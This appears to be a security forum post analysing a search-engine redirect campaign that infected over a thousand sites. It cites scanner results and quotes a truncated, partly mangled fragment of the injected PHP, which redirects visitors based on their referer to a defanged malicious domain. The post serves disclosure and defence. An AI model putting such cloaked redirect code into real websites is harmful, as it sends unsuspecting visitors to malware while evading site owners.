SE visitor redirect campaigns may be short-lived (couple of hours) or may be up and active for longer until finally being taken down or dead.
On for a couple of days is http://killmalware.com/g-010.com/# → SE visitors redirects
Visitors from search engines are redirected
to: htxp://korawi.4pu.com/
1016 sites infected with redirects to this URL
See: http://fetch.scritch.org/%2Bfetch/?url=http%3A%2F%2Fwww.g-010.com%2F%2Findex.php&useragent=Fetch+useragent&accept_encoding=
PHP attack → tristr($referer,“facebook.com”) or stristr($referer,“aol dot com”)) { if (!stristr($referer,“cache”) or !stristr($referer,“inurl”)){ header(“Location: htxp://korawi.4pu.com/”); …PHP 5.2.17p1 40%
see: http://www.urlvoid.com/scan/korawi.4pu.com/
See the redirecting site is not being blocked at the moment,
also see: http://sitecheck.sucuri.net/results/www.g-010.com/
which flags the malware as:
Suspicious domain detected. Details: http://sucuri.net/malware/malware-entry-mwblacklisted35
Location: htxp://korawi.4pu.com/ where avast! Web Shield should have detected PHP:Redirector-AF[Trj]

polonus